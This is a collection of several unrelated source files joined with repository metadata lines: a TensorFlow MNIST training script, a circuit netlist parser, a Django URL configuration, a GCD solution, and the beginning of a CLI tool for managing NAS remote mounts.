with tf.name_scope("weights"):
weights = tf.Variable(tf.zeros([784,10]))
tf.summary.histogram("weights",weights)
with tf.name_scope("biases"):
biases = tf.Variable(tf.zeros([10]))
tf.summary.histogram("biases",biases)
with tf.name_scope("net_output"):
net_output=tf.nn.softmax(tf.matmul(desired_input,weights)+biases)
embedding_input = net_output
embedding_size = 10
tf.summary.histogram("net_output",net_output)
return desired_input,desired_output,net_output,embedding_input,embedding_size
def train_model(use_cnn,learning_rate):
tf.reset_default_graph()
if use_cnn:
desired_input,desired_output,net_output,embedding_input,embedding_size=cnn_model()
# embedding_name="hidden_1024"
experiment_name="cnn_net"+str(learning_rate)+"/"
else:
desired_input,desired_output,net_output,embedding_input,embedding_size=hidden_model()
# embedding_name="output_10"
experiment_name="hidden_net"+str(learning_rate)+"/"
with tf.name_scope("train"):
with tf.name_scope("loss"):
loss_cross_entrop =tf.reduce_mean(-tf.reduce_sum(desired_output* \
tf.log(net_output),reduction_indices=[1]))
tf.summary.scalar("loss",loss_cross_entrop)
with tf.name_scope("train_step"):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_cross_entrop)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.arg_max(desired_output,1),tf.arg_max(net_output,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
tf.summary.scalar("accuracy",accuracy)
# If you want to see the picture in tensorboard, you can use summary.image
# function. The max number of pictures is 3 and present in gray scale(1).
# If you want to use RGB instead, you should change 1 to 3.
x_image = tf.reshape(desired_input, [-1, 28, 28, 1])
tf.summary.image('input', x_image, 3)
#tensorboard merged all
merged= tf.summary.merge_all()
#intiialize embedding matrix as 0s
embedding = tf.Variable(tf.zeros([1024, embedding_size]), name="embedding")
#give it calculated embedding
assignment = embedding.assign(embedding_input)
saver = tf.train.Saver()
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
writer = tf.summary.FileWriter(LOGDIR+experiment_name,sess.graph)
writer.add_graph(sess.graph)
## Format: tensorflow/contrib/tensorboard/plugins/projector/projector_config.proto
config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
## You can add multiple embeddings. Here we add only one.
embedding_config = config.embeddings.add()
embedding_config.tensor_name = embedding.name
embedding_config.sprite.image_path = LOGDIR + 'sprite_1024.png'
embedding_config.metadata_path = LOGDIR + 'labels_1024.tsv'
# Specify the width and height of a single thumbnail.
embedding_config.sprite.single_image_dim.extend([28, 28])
tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
for i in range(5001):
batch_desired_input,batch_desired_output = mnist.train.next_batch(100)
sess.run(train_step,feed_dict={desired_input:batch_desired_input, \
desired_output:batch_desired_output})
if i%200==0:
print ("step:",i," accuracy:",sess.run(accuracy,feed_dict={desired_input:mnist.test.images[:1024], \
desired_output:mnist.test.labels[:1024]}))
summary_data=sess.run(merged,feed_dict={desired_input:batch_desired_input, \
desired_output:batch_desired_output})
writer.add_summary(summary_data,i)
if i%1000==0:
sess.run(assignment, feed_dict={desired_input: mnist.test.images[:1024], desired_output: mnist.test.labels[:1024]})
#save checkpoints
saver.save(sess, os.path.join(LOGDIR, "model.ckpt"), i)
def main():
for learning_rate in [1e-3,1e-4,1e-5]:
for use_cnn in [False,True]:
print ("use_cnn:",use_cnn," learning_rate:",learning_rate)
train_model(use_cnn,learning_rate)
if __name__ == '__main__':
main() | darren1231/Tensorflow_tutorial | 11_compare_cnn_hidden/compare_cnn_hidden.py | compare_cnn_hidden.py | py | 7,911 | python | en | code | 0 | github-code | 90 |
41423570676 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 24 13:41:56 2022
@author: Sasuke
"""
#importing neccesary modules
import sys
import os
from collections import Counter
#defining circuit start and end tokens
CIRCUIT_START = ".circuit"
CIRCUIT_END = ".end"
ROOT_dir = os.getcwd() #gets your root directory
#tokenizer
def tokenizer(line):
'''
Parameters
----------
line : A string that has space seperated
value.
Returns
-------
A dictionary containing values of the
different elemnts given in the INPUT and there corresponding keys
'''
tokens = line.split()
token_dict = dict() # empty dictionary
# checks for the number of elements in the INPUT and stores them to a dictionary
if len(tokens) == 4:
token_dict["name"] = tokens[0]
token_dict["node0"] = tokens[1]
token_dict["node1"] = tokens[2]
token_dict["value"] = tokens[3]
elif len(tokens) == 5:
token_dict["name"] = tokens[0]
token_dict["node0"] = tokens[1]
token_dict["node1"] = tokens[2]
token_dict["source_voltage"] = tokens[3]
token_dict["value"] = tokens[4]
elif len(tokens) == 6:
token_dict["name"] = tokens[0]
token_dict["node0"] = tokens[1]
token_dict["node1"] = tokens[2]
token_dict["source_node0"] = tokens[3]
token_dict["source_node1"] = tokens[4]
token_dict["value"] = tokens[5]
else:
return -1; #Number of eleme4nts in INPUT cant be greater than 6
return token_dict # returns a dictionary containing tokens
assert len(sys.argv) == 2,"Please Input only the file name" #Ouput for wrong number of inputs
file_path = os.path.join(ROOT_dir, sys.argv[1]) # FIle Location
assert file_path.find("netlist") != -1, "Invalid file" # Incorrect Filename Entered
try:
with open(file_path, "r") as f:
text = f.read().splitlines()
#print(text)
occurence = Counter(text) # Counting word occurance
assert occurence[CIRCUIT_START] ==1 and occurence[CIRCUIT_END] == 1, " INVALID FILE FORMAT, file contains incorrect number of start or end token"
answer = []
try:
start_idx = text.index(CIRCUIT_START) + 1
end_idx = text.index(CIRCUIT_END)
assert start_idx<=end_idx #start_idx should be less or equal to end_idx
for _ in range(start_idx, end_idx): #interating though every line of input text
line = text[_].split("#")[0]
answer.append(" ".join(reversed(tokenizer(line).values()))) # reversing tokens and joining them
print(*reversed(answer), sep = '\n') #Printing reversed input
except:
print("Invalid file formating") #output for incorrect format
except FileNotFoundError as FNFE:
print(FNFE) # output if no file is found
| sasuke-ss1/EE2703 | Week 1/week1_code.py | week1_code.py | py | 2,809 | python | en | code | 1 | github-code | 90 |
15420570006 | from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from django.views.decorators.cache import cache_page
from posts import views
app_name = 'posts'
urlpatterns = [
path('', views.HomePageView.as_view(), name='index'),
path('posts', views.PostsListView.as_view(), name='post-list'),
path('category/', cache_page(60 * 15)(views.CategoriesListView.as_view()), name='category-list'),
path('tag/', cache_page(60 * 15)(views.TagsListView.as_view()), name='tags-list'),
path('tag/<slug:slug>/', cache_page(60 * 15)(views.TagDetailView.as_view()), name='tag-detail'),
path('category/<slug:slug>/', cache_page(60 * 15)(views.CategoryDetailView.as_view()), name='category-detail'),
path('mine/', views.ManagePostListView.as_view(), name='manage_post_list'),
path('create/', views.PostCreateView.as_view(), name='post_create'),
path('<slug:slug>/', views.PostDetailView.as_view(), name='post-detail'),
path('<slug:slug>/edit/', views.PostUpdateView.as_view(), name='post_edit'),
path('<slug:slug>/delete/', views.PostDeleteView.as_view(), name='post_delete'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| moskalec/news | news/posts/urls.py | urls.py | py | 1,278 | python | en | code | 0 | github-code | 90 |
18443624369 | def gcd(x, y):
if(y > x):
tmp = y
y = x
x = tmp
while(int(x%y)>0):
r = x%y
x = y
y = r
return y
n = int(input())
a = list(map(int, input().split()))
ans = gcd(a[0], a[1])
for i in range(1, n-1):
ans = min(ans, gcd(a[i], a[i+1]))
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03127/s136528534.py | s136528534.py | py | 318 | python | en | code | 0 | github-code | 90 |
25323810315 | import logging
from telegram import Update
from telegram.ext import ApplicationBuilder, ContextTypes, filters, MessageHandler, CommandHandler
import settings
logging.basicConfig(filename='bot.log', level=logging.INFO)
async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE):
await context.bot.send_message(chat_id=update.effective_chat.id, text=update.message.text)
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
print('Вызван /start')
await update.message.reply_text('Привет, пользователь! Ты вызвал команду /start')
def main():
application = ApplicationBuilder().token(settings.API_KEY).build()
echo_handler = MessageHandler(filters.TEXT & (~filters.COMMAND), echo)
application.add_handler(echo_handler)
start_handler = CommandHandler("start", start)
application.add_handler(start_handler)
logging.info("Bot started")
application.run_polling()
if __name__ == "__main__":
main() | anatalin/learn-python-ru-example | mybot/bot.py | bot.py | py | 1,028 | python | en | code | 0 | github-code | 90 |
34727122417 | #!/usr/bin/python3
def safe_print_division(a, b):
"""Divide two integers. Return None if undefined."""
try:
quotient = a / b
except ZeroDivisionError:
quotient = None
finally:
print("Inside result: {}".format(quotient))
return quotient
| keysmusician/holbertonschool-higher_level_programming | 0x05-python-exceptions/3-safe_print_division.py | 3-safe_print_division.py | py | 282 | python | en | code | 0 | github-code | 90 |
16623239417 | import gin
import tensorflow as tf
def get_inputs_from_file(input_filename, ignore_comments=False):
"""Read data from file and strip new lines."""
inputs = [line.rstrip() for line in tf.io.gfile.GFile(input_filename)]
# Strip the last empty line.
if not inputs[-1]:
inputs.pop()
if ignore_comments:
inputs = [l for l in inputs if not l.startswith("#")]
return inputs
def inputs_vocabulary(vocabulary):
"""Get the inputs vocabulary.
Args:
vocabulary: Vocabulary or (inputs_vocabulary, targets_vocabulary) tuple.
Returns:
a Vocabulary
"""
if isinstance(vocabulary, tuple):
vocabulary = vocabulary[0]
return vocabulary
def encode_inputs(inputs,
vocabulary,
model_type,
batch_size,
sequence_length,
eos_id=1,
unscored_prefix=None):
"""Encode string inputs for inference/scoring.
Args:
inputs: list of strings
vocabulary: a mtf.transformer.vocabulary.Vocabulary
model_type: a string
batch_size: an integer
sequence_length: an integer (maximum decode length)
eos_id: EOS id
unscored_prefix: an optional list of strings
Returns:
all_input_ids: encoded inputs
"""
n = len(inputs)
all_input_ids = []
for line_num, line in enumerate(inputs):
ids = inputs_vocabulary(vocabulary).encode(line.strip())
if unscored_prefix:
prefix_str = unscored_prefix[line_num].strip()
ids = [-i for i in inputs_vocabulary(vocabulary).encode(prefix_str)] + ids
if model_type != "lm":
# for text2self problems, the inputs represent a partial sequence
# to be continued, and should not be terminated by EOS.
# for sequence-to-sequence problems, the input needs to be EOS-terminated
ids += [eos_id]
if len(ids) > sequence_length:
ids = ids[:sequence_length]
else:
ids.extend([0] * (sequence_length - len(ids)))
all_input_ids.append(ids)
# pad to make an integral number of batches
all_input_ids.extend([all_input_ids[0]] * (-n % batch_size))
all_input_ids = np.array(all_input_ids, dtype=np.int32)
return all_input_ids
def decode_from_file(estimator,
vocabulary,
model_type,
batch_size,
sequence_length,
checkpoint_path=None,
input_filename=gin.REQUIRED,
output_filename=gin.REQUIRED,
eos_id=1,
repeats=1):
"""Decode from a text file and write to output_filename.
Args:
estimator: a TPUEstimator
vocabulary: a mtf.transformer.vocabulary.Vocabulary
model_type: a string
batch_size: an integer
sequence_length: an integer or a dict from feature-key to integer
the (packed) sequence length, e.g. {"inputs": 512, "targets": 128}
checkpoint_path: an optional string
input_filename: a string
output_filename: a string
eos_id: EOS id
repeats: an integer, the number of times to repeat each input.
"""
inputs = get_inputs_from_file(input_filename)
all_input_ids = encode_inputs(inputs, vocabulary, model_type, batch_size,
sequence_length["inputs"], eos_id=eos_id)
def input_fn(params):
del params
dataset = tf.data.Dataset.from_tensor_slices({"inputs": all_input_ids})
dataset = dataset.flat_map(
lambda x: tf.data.Dataset.from_tensors(x).repeat(repeats))
dataset = dataset.batch(batch_size, drop_remainder=True)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
return dataset
checkpoint_step = get_step_from_checkpoint_path(checkpoint_path)
decodes = decode(
estimator, input_fn, vocabulary, checkpoint_path=checkpoint_path)
# Remove any padded examples
dataset_size = len(inputs) * repeats
decodes = decodes[:dataset_size]
output_filename = "{}-{}".format(output_filename, checkpoint_step)
write_lines_to_file(decodes, output_filename)
| disi-unibo-nlp/bio-ee-egv | src/utils/t5x_utils/test_utils.py | test_utils.py | py | 4,029 | python | en | code | 11 | github-code | 90 |
22910490334 | import random
import os
import pygame
import tkinter as tk
from tkinter.filedialog import askdirectory
# lets initalize the music mixer here. Why not
pygame.mixer.init()
# I am using Tkinter askdirectory function. Tkinter auto opens a window on your computer and this hides that window. Keep it clean.
root = tk.Tk()
root.withdraw()
# clears the screen, let's start fresh
os.system("clear")
directory = askdirectory()
os.chdir(directory)
list_dir = os.listdir(directory)
list_dir.sort()
print(f"\n{directory}\n")
# print("\nHere is an available track listing\n")
list_of_songs = []
for files in list_dir:
if files.endswith(".mp3"):
list_of_songs.append(files)
# print(files)
# track_num = int(input("\nWhat track do you want to play?: "))
another_track = ""
score = 0
while another_track != "q":
three_rand_songs = random.sample(range(len(list_of_songs)), 3)
rando = random.randint(0,2)
track_num = three_rand_songs[rando]
choice = 1
for i in three_rand_songs:
rand_song_list = i
print(f"\n{choice}) --- {list_of_songs[rand_song_list]}\n")
choice += 1
pygame.mixer.music.stop()
pygame.mixer.init()
pygame.mixer.music.load(list_of_songs[int(track_num)])
pygame.mixer.music.play()
which_song = input("\nWhich song is playing? 1, 2, or 3? \n\nPress q to quit \n\n")
which_song = int(which_song) - 1
which_song = int(which_song)
if which_song == rando:
print("\n..............................\n")
print("\nCORRECT!\n")
score += 1
print(f"The score is\n\n{score}\n")
print("\n..............................\n")
else:
print("\n..............................\n")
print("\nsorry that is not it\n")
print(f"The score is\n\n{score}\n")
print("\n..............................\n")
print("\n..............................\n")
print(f"Thanks for playing the final score was {score}")
print("\n..............................\n") | adam-goodrich/Python_Practice | music_gamr.py | music_gamr.py | py | 1,991 | python | en | code | 0 | github-code | 90 |
38468256059 | import logging
import re
import unittest
from StringIO import StringIO
import OpenSSL
import twisted
from mocker import Mocker, expect
from twisted.internet import defer, reactor, error as txerror, ssl
from twisted.python import failure
from twisted.web import client, error as web_error
from twisted.trial.unittest import TestCase
from config import config
from ubuntuone.devtools.handlers import MementoHandler
from metrics.metricsconnector import MetricsConnector
from ubuntuone.storage.server.testing.testcase import TestWithDatabase
from ubuntuone.storage.server import ssl_proxy
from ubuntuone.storage.server.server import PREFERRED_CAP
from ubuntuone.storageprotocol.client import (
StorageClientFactory, StorageClient)
from ubuntuone.supervisor import utils as supervisor_utils
class SSLProxyServiceTest(TestWithDatabase):
"""Tests for the service instance."""
ssl_proxy_heartbeat_interval = 0
@defer.inlineCallbacks
def setUp(self):
yield super(SSLProxyServiceTest, self).setUp()
self.configure_logging()
self._old_heartbeat_interval = config.ssl_proxy.heartbeat_interval
self.metrics = MetricReceiver()
namespace = config.ssl_proxy.metrics_namespace
instance = MetricsConnector.new_txmetrics(connection=self.metrics,
namespace=namespace)
MetricsConnector.register_metrics("ssl-proxy", namespace, instance)
config.ssl_proxy.heartbeat_interval = self.ssl_proxy_heartbeat_interval
def configure_logging(self):
"""Configure logging for the tests."""
logger = logging.getLogger("ssl_proxy")
logger.setLevel(logging.DEBUG)
logger.propagate = False
self.handler = MementoHandler()
logger.addHandler(self.handler)
self.addCleanup(logger.removeHandler, self.handler)
@defer.inlineCallbacks
def tearDown(self):
config.ssl_proxy.heartbeat_interval = self._old_heartbeat_interval
yield super(SSLProxyServiceTest, self).tearDown()
MetricsConnector.unregister_metrics()
@defer.inlineCallbacks
def test_start_stop(self):
"""Test for start/stoService."""
ssl_service = ssl_proxy.ProxyService(
self.ssl_cert, self.ssl_key, self.ssl_cert_chain, 0, # port
"localhost", self.port, "ssl-proxy-test", 0)
# mimic what twistd will call when running the .tac file
yield ssl_service.privilegedStartService()
yield ssl_service.stopService()
class SSLProxyTestCase(TestWithDatabase):
"""Tests for ssl proxy server."""
ssl_proxy_heartbeat_interval = 0
@defer.inlineCallbacks
def setUp(self):
yield super(SSLProxyTestCase, self).setUp()
self.configure_logging()
self.ssl_service = ssl_proxy.ProxyService(self.ssl_cert,
self.ssl_key,
self.ssl_cert_chain,
0, # port
"localhost", self.port,
"ssl-proxy-test", 0)
# keep metrics in our MetricReceiver
self.metrics = MetricReceiver()
namespace = config.ssl_proxy.metrics_namespace
instance = MetricsConnector.new_txmetrics(connection=self.metrics,
namespace=namespace)
MetricsConnector.register_metrics("ssl-proxy", namespace, instance)
self._old_heartbeat_interval = config.ssl_proxy.heartbeat_interval
config.ssl_proxy.heartbeat_interval = self.ssl_proxy_heartbeat_interval
yield self.ssl_service.startService()
def configure_logging(self):
"""Configure logging for the tests."""
logger = logging.getLogger("ssl_proxy")
logger.setLevel(logging.DEBUG)
logger.propagate = False
self.handler = MementoHandler()
logger.addHandler(self.handler)
self.addCleanup(logger.removeHandler, self.handler)
@defer.inlineCallbacks
def tearDown(self):
config.ssl_proxy.heartbeat_interval = self._old_heartbeat_interval
yield super(SSLProxyTestCase, self).tearDown()
yield self.ssl_service.stopService()
MetricsConnector.unregister_metrics()
@property
def ssl_port(self):
"""SSL port."""
return self.ssl_service.port
class BasicSSLProxyTestCase(SSLProxyTestCase):
"""Basic tests for the ssl proxy service."""
def test_server(self):
"""Stop and restart the server."""
d = self.ssl_service.stopService()
d.addCallback(lambda _: self.ssl_service.startService())
return d
def test_connect(self):
"""Create a simple client that just connects."""
def dummy(client):
client.test_done("ok")
return self.callback_test(dummy, use_ssl=True)
def test_both_ways(self):
"""Test that communication works both ways."""
@defer.inlineCallbacks
def auth(client):
yield client.protocol_version()
return self.callback_test(auth, add_default_callbacks=True,
use_ssl=True)
@unittest.skip('Should fail with connectionDone')
@defer.inlineCallbacks
def test_ssl_handshake_backend_dead(self):
"""No ssl handshake failure if the backend is dead."""
# turn off the backend
yield self.service.stopService()
self.addCleanup(self.service.startService)
# patch connectionMade to get a reference to the client.
client_d = defer.Deferred()
orig_connectionMade = StorageClient.connectionMade
def connectionMade(s):
"""Intercecpt connectionMade."""
orig_connectionMade(s)
client_d.callback(s)
self.patch(StorageClient, 'connectionMade', connectionMade)
f = StorageClientFactory()
# connect to the servr
reactor.connectSSL(
"localhost", self.ssl_port, f, ssl.ClientContextFactory())
storage_client = yield client_d
# try to do anything and fail with ConnectionDone
try:
yield storage_client.set_caps(PREFERRED_CAP)
except txerror.ConnectionDone:
pass
except OpenSSL.SSL.Error as e:
self.fail("Got %s" % e)
else:
self.fail("Should get a ConnectionDone.")
def test_producers_registered(self):
"""Test that both producers are registered."""
orig = self.ssl_service.factory.buildProtocol
called = []
def catcher(*a, **kw):
"""collect calls to buildProtocol."""
p = orig(*a, **kw)
called.append(p)
return p
self.patch(self.ssl_service.factory, 'buildProtocol', catcher)
@defer.inlineCallbacks
def auth(client):
yield client.protocol_version()
proto = called[0]
# check that the producers match
# backend transport is the frontend producer
self.assertIdentical(
proto.peer.transport, proto.transport.producer)
# frontend transport is the backend producer
self.assertIdentical(
proto.transport, proto.peer.transport.producer)
return self.callback_test(auth, add_default_callbacks=True,
use_ssl=True)
if twisted.version.major >= 11:
test_producers_registered.skip = "already fixed in twisted >= 11"
@defer.inlineCallbacks
def test_server_status_ok(self):
"""Check that server status page works."""
page = yield client.getPage("http://localhost:%i/status" %
self.ssl_service.status_port)
self.assertEqual("OK", page)
@defer.inlineCallbacks
def test_server_status_fail(self):
"""Check that server status page works."""
# shutdown the tcp port of the storage server.
self.service.tcp_service.stopService()
d = client.getPage("http://localhost:%i/status" %
(self.ssl_service.status_port,))
e = yield self.assertFailure(d, web_error.Error)
self.assertEqual("503", e.status)
self.assertEqual("Service Unavailable", e.message)
self.assertIn('Connection was refused by other side: 111', e.response)
def test_heartbeat_disabled(self):
"""Test that the hearbeat is disabled."""
self.assertFalse(self.ssl_service.heartbeat_writer)
class SSLProxyHeartbeatTestCase(SSLProxyTestCase):
"""Tests for ssl proxy server heartbeat."""
ssl_proxy_heartbeat_interval = 0.1
@defer.inlineCallbacks
def setUp(self):
self.stdout = StringIO()
send_heartbeat = supervisor_utils.send_heartbeat
self.patch(supervisor_utils, 'send_heartbeat',
lambda *a, **kw: send_heartbeat(out=self.stdout))
yield super(SSLProxyHeartbeatTestCase, self).setUp()
@defer.inlineCallbacks
def test_heartbeat_stdout(self):
"""Test that the heartbeat is working."""
d = defer.Deferred()
reactor.callLater(0.2, d.callback, None)
yield d
self.assertIn('<!--XSUPERVISOR:BEGIN-->', self.stdout.buflist)
self.assertIn('<!--XSUPERVISOR:END-->', self.stdout.buflist)
class ProxyServerTest(TestCase):
"""Tests for ProxyServer class."""
@defer.inlineCallbacks
def setUp(self):
yield super(ProxyServerTest, self).setUp()
self.server = ssl_proxy.ProxyServer()
# setup a client too
self.peer = ssl_proxy.ProxyClient()
self.peer.setPeer(self.server)
@defer.inlineCallbacks
def tearDown(self):
self.server = None
yield super(ProxyServerTest, self).tearDown()
MetricsConnector.unregister_metrics()
def test_connectionMade(self):
"""Test connectionMade with handshake done."""
mocker = Mocker()
metrics = self.server.metrics = mocker.mock()
transport = self.server.transport = mocker.mock()
self.server.factory = ssl_proxy.SSLProxyFactory(0, 'host', 0)
called = []
self.patch(reactor, 'connectTCP',
lambda *a: called.append('connectTCP'))
expect(metrics.meter('frontend_connection_made', 1))
expect(transport.getPeer()).result("host:port info").count(1)
expect(transport.pauseProducing())
with mocker:
self.server.connectionMade()
self.assertEqual(called, ['connectTCP'])
def test_connectionLost(self):
"""Test connectionLost method."""
mocker = Mocker()
metrics = self.server.metrics = mocker.mock()
transport = self.server.transport = mocker.mock()
self.server.peer = self.peer
peer_transport = self.peer.transport = mocker.mock()
expect(metrics.meter('frontend_connection_lost', 1))
expect(transport.getPeer()).result("host:port info").count(1)
expect(peer_transport.loseConnection())
with mocker:
self.server.connectionLost()
class MetricReceiver(object):
"""A receiver for metrics."""
def __init__(self):
"""Initialize the received message list."""
self.received = []
def __contains__(self, pattern):
regex = re.compile(pattern)
for message in self.received:
if any(regex.findall(message)):
return True
return False
def connect(self, transport=None):
"""Not implemented."""
pass
def disconnect(self):
"""Not implemented."""
pass
def write(self, message):
"""Store the received message and stack."""
self.received.append(message)
class SSLProxyMetricsTestCase(SSLProxyTestCase):
"""Tests for ssl proxy metrics using real connections."""
@defer.inlineCallbacks
def setUp(self):
yield super(SSLProxyMetricsTestCase, self).setUp()
# keep the protocols created in a list
self.protocols = []
buildProtocol = self.ssl_service.factory.buildProtocol
def build_protocol(*a, **kw):
"""Keep a reference to the just created protocol instance."""
p = buildProtocol(*a, **kw)
self.protocols.append(p)
return p
self.patch(self.ssl_service.factory, 'buildProtocol', build_protocol)
@defer.inlineCallbacks
def test_start_stop(self):
"""Start/stop metrics."""
self.assertIn('server_start', self.metrics)
yield self.ssl_service.stopService()
self.assertIn('server_stop', self.metrics)
@defer.inlineCallbacks
def test_frontend_connection_made(self):
"""Frontend connectionMade metrics."""
def dummy(client):
client.test_done('ok')
yield self.callback_test(dummy, use_ssl=True)
self.assertIn('frontend_connection_made', self.metrics)
self.assertTrue(self.handler.check_debug('Frontend connection made'))
@defer.inlineCallbacks
def test_frontend_connection_lost(self):
"""Frontend connectionLost metrics."""
d = defer.Deferred()
def dummy(client):
# patch ProxyServer.connectionLost
orig_connectionLost = self.protocols[0].connectionLost
def connectionLost(reason):
"""Catch disconnect and force a ConnectionLost."""
orig_connectionLost(txerror.ConnectionLost())
d.callback(None)
self.patch(self.protocols[0], 'connectionLost', connectionLost)
client.kill() # kill the client and trigger a connection lost
client.test_done('ok')
yield self.callback_test(dummy, use_ssl=True)
yield d
self.assertIn('frontend_connection_lost', self.metrics)
self.assertTrue(self.handler.check_debug('Frontend connection lost'))
@defer.inlineCallbacks
def test_backend_connection_made(self):
"""Backend connectionMade metrics."""
def dummy(client):
client.test_done('ok')
yield self.callback_test(dummy, use_ssl=True)
self.assertIn('backend_connection_made', self.metrics)
self.assertTrue(self.handler.check_debug('Backend connection made'))
@defer.inlineCallbacks
def test_backend_connection_lost(self):
"""Backend connectionLost metrics."""
d = defer.Deferred()
def dummy(client):
orig_connectionLost = self.protocols[0].peer.connectionLost
def connectionLost(reason):
"""Catch disconnect and force a ConnectionLost."""
orig_connectionLost(failure.Failure(txerror.ConnectionLost()))
d.callback(None)
self.patch(
self.protocols[0].peer, 'connectionLost', connectionLost)
self.service.factory.protocols[0].shutdown()
client.test_done('ok')
yield self.callback_test(dummy, use_ssl=True)
yield d
self.assertIn('backend_connection_lost', self.metrics)
self.assertTrue(self.handler.check_debug('Backend connection lost'))
@defer.inlineCallbacks
def test_backend_connection_done(self):
"""Backend connectionDone metrics."""
d = defer.Deferred()
def dummy(client):
orig_connectionLost = self.protocols[0].peer.connectionLost
def connectionLost(reason):
"""Catch disconnect and force a ConnectionLost."""
orig_connectionLost(failure.Failure(txerror.ConnectionDone()))
d.callback(None)
self.patch(
self.protocols[0].peer, 'connectionLost', connectionLost)
self.service.factory.protocols[0].shutdown()
client.test_done('ok')
yield self.callback_test(dummy, use_ssl=True)
yield d
self.assertIn('backend_connection_done', self.metrics)
self.assertTrue(self.handler.check_debug('Backend connection done'))
| stevegood/filesync-server | src/server/tests/test_ssl_proxy.py | test_ssl_proxy.py | py | 16,149 | python | en | code | 7 | github-code | 90 |
23650027912 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#########################################################
# SCRIPT : xremotemount.py #
# Xnas manage remote mounts #
# #
# I. Helwegen 2020 #
#########################################################
####################### IMPORTS #########################
import sys
from common.xnas_engine import xnas_engine
from common.xnas_check import xnas_check
from remotes.remotemount import remotemount
#########################################################
####################### GLOBALS #########################
NAMELIST = ["add", "del", "mnt", "umnt", "clr", "ena", "dis", "shw"]
NAMECHECK = ["del", "clr", "mnt", "dis", "shw"]
#########################################################
###################### FUNCTIONS ########################
#########################################################
# Class : xremotemount #
#########################################################
class xremotemount(xnas_engine):
def __init__(self):
xnas_engine.__init__(self, "xremotemount")
self.settings = {}
def __del__(self):
xnas_engine.__del__(self)
def run(self, argv):
result = True
self.handleArgs(argv)
Remotemount = remotemount(self, self.settings['human'])
xcheck = xnas_check(self, Remotemount = Remotemount, json = self.settings['json'])
if xcheck.ErrorExit(xcheck.check(), self.settings, NAMECHECK):
if self.settings["json"]:
self.printJsonResult(False)
exit(1)
del xcheck
if not self.hasSetting(self.settings,"command"):
remotemounts = Remotemount.getRemotemounts()
if self.settings["json"]:
self.printJson(remotemounts)
else:
self.prettyPrintTable(remotemounts)
elif self.settings["command"] == "add":
self.needSudo()
result = Remotemount.addRm(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated with new remotemount entries")
if self.settings["json"]:
self.printJsonResult(result)
# zfs do not create or destroy, use ZFS for that!
elif self.settings["command"] == "del":
self.needSudo()
result = Remotemount.delRm(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated")
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "pop":
self.needSudo()
doUpdate = True
if 'pop' in self.settings:
if not self.settings['pop']:
doUpdate = False
else:
self.settings['pop'] = []
addedRemotemounts = Remotemount.pop(self.settings['interactive'], self.settings['pop'])
if addedRemotemounts:
if doUpdate:
self.update()
self.logger.info("Database updated with new remotemount entries")
if self.settings["json"]:
self.printJson(addedRemotemounts)
else:
self.prettyPrintTable(addedRemotemounts)
elif self.settings["command"] == "mnt":
self.needSudo()
result = Remotemount.mnt(self.settings["name"])
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "umnt":
self.needSudo()
result = Remotemount.umnt(self.settings["name"])
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "clr":
self.needSudo()
result = Remotemount.clr(self.settings["name"])
if result:
self.update()
self.logger.info("Database updated")
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "ena":
self.needSudo()
#result = Remotemount.ena(self.settings["name"])
self.parseError("Command deprecated, use --method option instead")
result = False
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "dis":
self.needSudo()
#result = Remotemount.dis(self.settings["name"])
self.parseError("Command deprecated, use --method option instead")
result = False
if self.settings["json"]:
self.printJsonResult(result)
elif self.settings["command"] == "shw":
self.needSudo()
remotemountData = Remotemount.shw(self.settings["name"])
if self.settings["json"]:
self.printJson(remotemountData)
else:
self.prettyPrintTable(self.settings2Table(remotemountData))
elif self.settings["command"] == "lst":
entries = Remotemount.inDB()
if self.settings["json"]:
self.printJson(entries)
else:
self.prettyPrintTable(entries)
elif self.settings["command"] == "url":
url = Remotemount.findUrl()
if self.settings["json"]:
self.printJson(url)
else:
self.printValues(url)
else:
self.parseError("Unknown command argument")
result = False
if self.settings["json"]:
self.printJsonResult(result)
exit(0 if result else 1)
def nameRequired(self):
if self.hasSetting(self.settings,"command"):
if self.settings["command"] in NAMELIST and not "name" in self.settings:
self.parseError("The option {} requires a <name> as argument".format(self.settings["command"]))
def handleArgs(self, argv):
xargs = {"add": "adds or edits a remotemount [add <name>]",
"del": "deletes a remotemount [del <name>]",
"pop": "populates from fstab [pop]",
"mnt": "mounts a remotemount [mnt <name>]",
"umnt": "unmounts a remotemount if not referenced [umnt <name>]",
"clr": "removes a remotemount, but leaves fstab [clr <name>]",
"shw": "shows current remotemount settings [shw <name>]",
"lst": "lists xremotemount compatible fstab entries [lst]",
"url": "prints url of a <name> or <server>, <sharename> [url]",
"-": "show remotemounts and their status"}
xopts = {"interactive": "ask before adding or changing mounts",
"human": "show sizes in human readable format",
"https": "davfs use https <boolean> (default = True) (add)",
"server": "server for remote mount <string> (add)",
"sharename": "sharename for remote mount <string> (add)",
"mountpoint": "mountpoint <string> (add)",
"type": "type <string> (davfs, cifs, s2hfs, nfs or nfs4) (add)",
"options": "extra options, besides _netdev <string> (add)",
"rw": "mount rw <boolean> (add)",
"freq": "dump value <value> (add)",
"pass": "mount order <value> (add)",
"uacc": "users access level (,r,w) (default = rw) (add)",
"sacc": "superuser access level (,r,w) (default = rw) (add)",
"username": "remote mount access username (guest if omitted) (add)",
"password": "remote mount access password (add)",
"action": "addkey, addcred, delkey, delcred (s2hfs) (add)",
"method": "mount method <string> (see below) (add)",
"idletimeout": "unmount when idle timeout <int> (default = 30) (add)",
